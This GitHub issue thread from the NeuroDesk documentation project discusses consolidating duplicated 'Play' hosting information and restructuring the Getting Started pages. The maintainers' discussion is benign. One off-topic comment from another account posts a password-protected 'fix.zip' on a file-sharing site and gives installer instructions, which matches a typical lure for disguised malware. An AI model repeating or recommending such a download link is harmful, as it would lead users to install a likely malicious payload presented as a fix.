### ISSUE TITLE
play information is different on two different pages

### ISSUE THREAD

**Issue by stebo85** [NeuroDesk/neurodesk.github.io#439]

**Comment by stebo85** [comment]
https://play.neurodesk.org/
https://www.neurodesk.org/docs/getting-started/neurodesktop/play/

can we consolidate with the restructuring task?

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aswinnarayanan** [comment]
Yeah, the https://play.neurodesk.org only exists because we were planning to use geo-location steering, which we weren't able to do with tls. So its a simple workaround i.e. We just give / promot the https://play.neurodesk.org link, and users self select their optimal server
Otherwise, we have to give (or users find) https://www.neurodesk.org/docs/getting-started/neurodesktop/play/ which is harder to remember

**Comment by stebo85** [comment]
so, could play.neurodesk.org forward to https://www.neurodesk.org/docs/getting-started/neurodesktop/play/  ?

**Comment by aswinnarayanan** [comment]
We could just keep, maintain and update the links at play.neurodesk.org, and on the main site have:

# Hosted Neurodesk environments
## Play
Play is for .... 
See https://play.neurodesk.org for nearest server

**Comment by iishiishii** [comment]
Shall we revamp the Getting started section? Separate installation and starting command to avoid long instructions and GPU support is often neglected at the end of the doc. There's also some duplication between neurocommand and neurocontainers.

### Installation and Setup
#### Graphical Interface (GUI)
Linux
Windows
macOS
Cloud Deployment
Troubleshooting Installation

#### Command Line Interface (CLI)
using CVMFS
using Datalad
using Docker
using Singularity
on HPC
Cloud Deployment

### Usage Guide
lmod
module load
gpu
data storage

**Comment by stebo85** [comment]
Proposal: We keep the information on play.neurodesk.org and remove the information from the main documentation and replace it with a link to play.neurodesk.org. 

This new link will be in under the new "hosted" section.

**Comment by stebo85** [comment]
proposal for the website restructure:

meeting with @iishiishii , @aswinnarayanan, @stebo85 

idea: 

decision of the users should be
1) Client "how to access": Neurodesk App, Browser, CLI, 
2) Server "where it's running": Local Docker, HPC, Play, Nectar ...

write a list of how users can currently access neurodesk and see if we can find common clusters

**Comment by stebo85** [comment]
Change 1:
Under getting started: 2 new sections:
1) Hosted -> Play (move with redirect), Nectar (move with redirect), Colab (move), 
2) Local -> Neurodesk App

These two things become our new getting started buttons + What is Neurodesk

@iishiishii - until end of week, or Aswin/Steffen after that



Future Change:
Move advanced Topics into Developers
- k3s

move rarely used instructions + merge HPC Linux and Neurcommand

**Comment by iishiishii** [comment]
Updated doc: https://iishiishii.github.io/neurodesk.github.io/
If there's no issue, I'll merge my PR

**Comment by stebo85** [comment]
great - looks all good to me and can be merged :)
